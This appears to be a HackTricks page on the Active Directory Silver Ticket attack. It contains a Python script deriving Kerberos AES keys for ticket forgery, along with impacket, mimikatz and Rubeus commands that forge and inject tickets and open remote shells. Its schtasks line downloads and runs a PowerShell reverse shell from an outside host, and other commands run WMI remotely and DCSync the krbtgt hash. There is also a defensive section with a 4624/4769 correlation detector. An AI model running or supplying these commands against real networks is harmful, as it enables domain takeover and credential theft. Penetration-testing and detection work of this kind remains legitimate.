HackTricks
Silver Ticket

The Silver Ticket attack is based on forging a valid TGS (service ticket) for a service once the secret of the account that runs that service is owned: its NTLM hash or, better, its AES key. For host-based services (CIFS, HOST, RPCSS, HTTP, ...) that account is the target's computer account, which in AD is just a special kind of user account. Owning a machine account hash therefore makes it possible to craft a TGS for that machine as any user, with any group memberships in the PAC, and for example to get into it with administrator privileges through the SMB service. The forged ticket goes straight to the service and is validated with the service's own key, so the DC never sees a TGS-REQ for it. Computer accounts reset their passwords every 30 days by default, so a stolen machine key only stays usable until the next rotation.
Tickets can also be forged with the AES Kerberos keys (AES128 and AES256) instead of the RC4/NTLM hash, which looks far less suspicious on domains where RC4 tickets are rare or blocked. To know how to generate an AES key from a password read section 4.4 of MS-KILE or the Get-KerberosAESKey.ps1 script.
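The following is an added example (not code from HackTricks or from Get-KerberosAESKey.ps1) that derives the AES128/AES256 Kerberos keys from a cleartext password the way Active Directory does: RFC 3962 string-to-key (PBKDF2-HMAC-SHA1 with 4096 iterations, then DK with the "kerberos" constant) combined with the MS-KILE salt rules for user and computer accounts. It needs the `cryptography` package; the jurassic.park host name and the password in the demo call are made up.

```python
"""Derive the Kerberos AES keys (RFC 3962) for an AD account so a silver ticket
can be forged with /aes128 or /aes256 instead of the RC4 (NTLM) hash.
Added example; not part of the original page. Requires 'cryptography'."""
import hashlib
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# n-fold("kerberos") folded to 128 bits (RFC 3961, Appendix A.1). The AES
# enctypes only ever need this one constant, so it is hard-coded instead of
# implementing the general n-fold routine.
NFOLD_KERBEROS_128 = bytes.fromhex("6b65726265726f737b9b5b2b93132b93")

# Active Directory uses the RFC 3962 default iteration count.
AD_ITERATIONS = 4096


def ad_salt(domain: str, sam_account_name: str) -> str:
    """MS-KILE salt: users get DOMAIN (upper) + case-sensitive sAMAccountName;
    computer accounts get DOMAIN (upper) + 'host' + name (lower, no '$')
    + '.' + dns domain (lower)."""
    if sam_account_name.endswith("$"):
        host = sam_account_name[:-1].lower()
        return f"{domain.upper()}host{host}.{domain.lower()}"
    return f"{domain.upper()}{sam_account_name}"


def _aes_block(key: bytes, block: bytes) -> bytes:
    """Encrypt one 16-byte block. RFC 3962's DR() uses AES-CTS with a zero IV,
    which for exactly one block is identical to plain AES-ECB."""
    enc = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
    return enc.update(block) + enc.finalize()


def aes_string_to_key(password: str, salt: str, bits: int,
                      iterations: int = AD_ITERATIONS) -> bytes:
    """RFC 3962 string-to-key: tkey = PBKDF2-HMAC-SHA1(password, salt);
    key = DK(tkey, "kerberos") = E(tkey, nfold) for AES128, and
    E(tkey, nfold) || E(tkey, E(tkey, nfold)) for AES256."""
    if bits not in (128, 256):
        raise ValueError("AES enctype must be 128 or 256 bits")
    klen = bits // 8
    tkey = hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"),
                               salt.encode("utf-8"), iterations, klen)
    k1 = _aes_block(tkey, NFOLD_KERBEROS_128)
    if bits == 128:
        return k1
    return k1 + _aes_block(tkey, k1)  # second block chains on the first


def ad_aes_keys(domain: str, sam_account_name: str, password: str) -> dict:
    """Convenience wrapper: salt plus both AES keys, hex-encoded as mimikatz
    and Rubeus expect them for /aes128 and /aes256."""
    salt = ad_salt(domain, sam_account_name)
    return {
        "salt": salt,
        "aes128": aes_string_to_key(password, salt, 128).hex(),
        "aes256": aes_string_to_key(password, salt, 256).hex(),
    }


if __name__ == "__main__":
    # Hypothetical computer account of the page's lab host; password is made up.
    print(ad_aes_keys("jurassic.park", "LABWWS02$", "P@ssw0rd"))
```

The salt is the part people get wrong: a computer account's key is salted with `DOMAIN.TLDhosthostname.domain.tld`, not with the account name, and the user salt is case-sensitive, so `Administrator` and `administrator` give different keys. The iteration count is exposed so the function can be checked against the RFC 3962 test vectors, which use a count of 1.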
Linux
    # Forge the service ticket with impacket; ticketer.py writes stegosaurus.ccache in the current directory
    python ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park -spn cifs/labwws02.jurassic.park stegosaurus
    # Point the Kerberos credential cache at the forged ticket
    export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
    # Authenticate with the cached ticket only (-k -no-pass) and get a shell over SMB
    python psexec.py jurassic.park/stegosaurus@labwws02.jurassic.park -k -no-pass
In Windows, Mimikatz can be used to craft the ticket. Next, the ticket is injected with Rubeus, and finally a remote shell can be obtained thanks to PsExec.
Windows
    #Create the ticket (kerberos::golden with /service and /target forges a silver ticket; the output file is ticket.kirbi)
    mimikatz.exe "kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park"
    #Inject in memory using mimikatz or Rubeus
    mimikatz.exe "kerberos::ptt ticket.kirbi"
    .\Rubeus.exe ptt /ticket:ticket.kirbi
    #Obtain a shell
    .\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
The CIFS service is the one that gives access to the victim's file system over SMB. Other services are listed at https://adsecurity.org/?page_id=183. For example, with a HOST ticket you can create a scheduled task on a computer; check that it worked by listing the victim's tasks with schtasks /S <hostname>. With HOST and RPCSS tickets you can execute WMI queries against a computer; test it with Get-WmiObject -Class win32_operatingsystem -ComputerName <hostname>.

Mitigation

A silver ticket is stealthier than a golden ticket: the forged TGS is never requested from the KDC, so the domain controllers log no 4768/4769 for it. The only trace is on the target host, in the events that any logon produces:
    4624: Account Logon
    4634: Account Logoff
    4672: Admin Logon
Detection therefore relies on correlating those host-side Kerberos logons with the TGS requests (4769) collected from every DC: a Kerberos network logon for which no DC ever issued a service ticket is the signature of a forged ticket.
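The following is an added example (not part of the HackTricks page) of that correlation over a handful of constructed Security-log events: member-server 4624 Kerberos network logons are matched against successful 4769 events from the DCs for the same user and host, and any logon without a matching ticket issued within the last 10 hours (the default maximum service ticket lifetime) is flagged. Field names are simplified from the real event XML, and the event data is made up for the demo.

```python
"""Correlate host-side Kerberos logons (4624) with the service tickets the DCs
logged (4769). A silver ticket never passes through the KDC, so the target host
records a logon for which no DC ever issued a TGS.
Added example with constructed events; not part of the original page."""
from datetime import datetime, timedelta

# Constructed sample events (not real logs); times are UTC. In practice these
# come from Get-WinEvent or the SIEM, and DC_EVENTS must cover every DC.
DC_EVENTS = [
    {"event_id": 4768, "time": "2023-05-02T08:00:05", "account": "velociraptor@JURASSIC.PARK",
     "service": "krbtgt", "status": "0x0"},                    # TGT request, not a service ticket
    {"event_id": 4769, "time": "2023-05-02T08:00:10", "account": "velociraptor@JURASSIC.PARK",
     "service": "LABWWS02$", "status": "0x0"},                 # legitimate TGS for the host
    {"event_id": 4769, "time": "2023-05-02T08:30:00", "account": "triceratops@JURASSIC.PARK",
     "service": "LABWWS02$", "status": "0xd"},                 # failed TGS-REQ, no ticket issued
]
HOST_EVENTS = [  # logged on LABWWS02 itself
    {"event_id": 4624, "time": "2023-05-02T08:00:12", "host": "LABWWS02", "account": "velociraptor",
     "logon_type": 3, "auth_package": "Kerberos", "src_ip": "10.0.0.25"},  # backed by a 4769
    {"event_id": 4624, "time": "2023-05-02T08:30:05", "host": "LABWWS02", "account": "triceratops",
     "logon_type": 3, "auth_package": "Kerberos", "src_ip": "10.0.0.30"},  # only a failed 4769 exists
    {"event_id": 4624, "time": "2023-05-02T09:15:00", "host": "LABWWS02", "account": "stegosaurus",
     "logon_type": 3, "auth_package": "Kerberos", "src_ip": "10.0.0.99"},  # silver ticket: no 4769 at all
    {"event_id": 4624, "time": "2023-05-02T09:20:00", "host": "LABWWS02", "account": "LABWWS02$",
     "logon_type": 3, "auth_package": "NTLM", "src_ip": "10.0.0.7"},       # NTLM logon, out of scope
    {"event_id": 4672, "time": "2023-05-02T09:15:00", "host": "LABWWS02", "account": "stegosaurus"},
]

# Default maximum lifetime of a service ticket; a cached ticket may legitimately
# be reused for that long after the single 4769 that issued it.
DEFAULT_TGS_LIFETIME = timedelta(hours=10)


def _ts(value: str) -> datetime:
    return datetime.fromisoformat(value)


def _norm_account(name: str) -> str:
    """'velociraptor@JURASSIC.PARK' -> 'velociraptor' (case-insensitive)."""
    return name.split("@", 1)[0].lower()


def _norm_service(name: str) -> str:
    """4769 ServiceName is the computer account ('LABWWS02$'); the 4624 host
    field is the bare name ('LABWWS02'). Normalise both to 'labwws02'."""
    return name.rstrip("$").lower()


def index_tgs_requests(dc_events):
    """(account, target host) -> list of times a DC issued a service ticket."""
    index = {}
    for ev in dc_events:
        if ev.get("event_id") != 4769 or ev.get("status") != "0x0":
            continue  # TGT requests and failed TGS-REQs produce no usable ticket
        key = (_norm_account(ev["account"]), _norm_service(ev["service"]))
        index.setdefault(key, []).append(_ts(ev["time"]))
    return index


def find_unbacked_kerberos_logons(host_events, dc_events, window=DEFAULT_TGS_LIFETIME):
    """Return the 4624 events that used Kerberos for a network logon although no
    DC issued a service ticket for that (user, host) within `window` beforehand."""
    issued = index_tgs_requests(dc_events)
    flagged = []
    for ev in host_events:
        if ev.get("event_id") != 4624 or ev.get("auth_package") != "Kerberos":
            continue
        if ev.get("logon_type") != 3:
            continue  # a forged CIFS/HOST/HTTP ticket shows up as a network logon
        key = (_norm_account(ev["account"]), _norm_service(ev["host"]))
        t = _ts(ev["time"])
        if not any(t - window <= when <= t for when in issued.get(key, [])):
            flagged.append(ev)
    return flagged


if __name__ == "__main__":
    for ev in find_unbacked_kerberos_logons(HOST_EVENTS, DC_EVENTS):
        print(f"{ev['time']} {ev['host']}: Kerberos logon of {ev['account']} "
              f"from {ev['src_ip']} with no matching 4769 on any DC")
```

Two caveats when running this for real: the 4769 feed has to include every DC in the domain (the client may have asked any of them), and a ticket that was renewed rather than re-requested shows up as 4770, so renewal events should be indexed alongside 4769 to avoid false positives on long-lived sessions.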

Available Services

Service type: silver ticket(s) to forge
    WMI: HOST, RPCSS
    PowerShell Remoting: HOST, HTTP (depending on the OS also WSMAN, RPCSS)
    WinRM: HOST, HTTP (on some occasions you can just ask for WINRM)
    Scheduled Tasks: HOST
    Windows File Share, also psexec: CIFS
    LDAP operations, included DCSync: LDAP
    Windows Remote Server Administration Tools: RPCSS, LDAP, CIFS
    Golden Tickets: krbtgt
Rubeus can obtain tickets for all of these services in one go through its /altservice parameter (an option of its s4u command, which rewrites the SPN of the resulting ticket to each listed service):
    /altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Abusing Service tickets

In the following examples lets imagine that the ticket is retrieved impersonating the administrator account.

CIFS

With this ticket you will be able to access the C$ and ADMIN$ shares via SMB (if they are exposed) and copy files to any part of the remote filesystem just doing something like:
    dir \\vulnerable.computer\C$
    dir \\vulnerable.computer\ADMIN$
    copy afile.txt \\vulnerable.computer\C$\Windows\Temp
You will also be able to obtain a shell inside the host or execute arbitrary commands using psexec, as in the ticket-creation examples above (PsExec.exe on Windows, impacket's psexec.py on Linux).

HOST

With this permission you can generate scheduled tasks in remote computers and execute arbitrary commands:
    #Check you have permissions to use schtasks over a remote server
    schtasks /S some.vuln.pc
    #Create a scheduled task (two alternatives: run an exe, or download and run a PowerShell reverse shell)
    schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
    schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')'"
    #Check it was successfully created
    schtasks /query /S some.vuln.pc
    #Run the created schtask now
    schtasks /Run /S some.vuln.pc /TN "SomeTaskName"

HOST + RPCSS

With these tickets you can execute WMI in the victim system:
    #Check you have enough privileges
    Get-WmiObject -Class win32_operatingsystem -ComputerName remote.computer.local
    #Execute code
    $Computer = "remote.computer.local"
    $RunCommand = "cmd.exe /c whoami > C:\Windows\Temp\out.txt"
    Invoke-WmiMethod -Class win32_process -ComputerName $Computer -Name Create -ArgumentList $RunCommand

    #You can also use wmic
    wmic /node:remote.computer.local os list full /format:list

HOST + WSMAN (WINRM)

With winrm access over a computer you can access it and even get a PowerShell:
    New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
Note that winrm must be active and listening on the remote computer to access it.

LDAP

With this privilege you can dump the DC database using DCSync. Since DCSync talks to a domain controller, the LDAP silver ticket has to target a DC, so this requires the key of the DC's own computer account, not that of an ordinary member server:
    mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt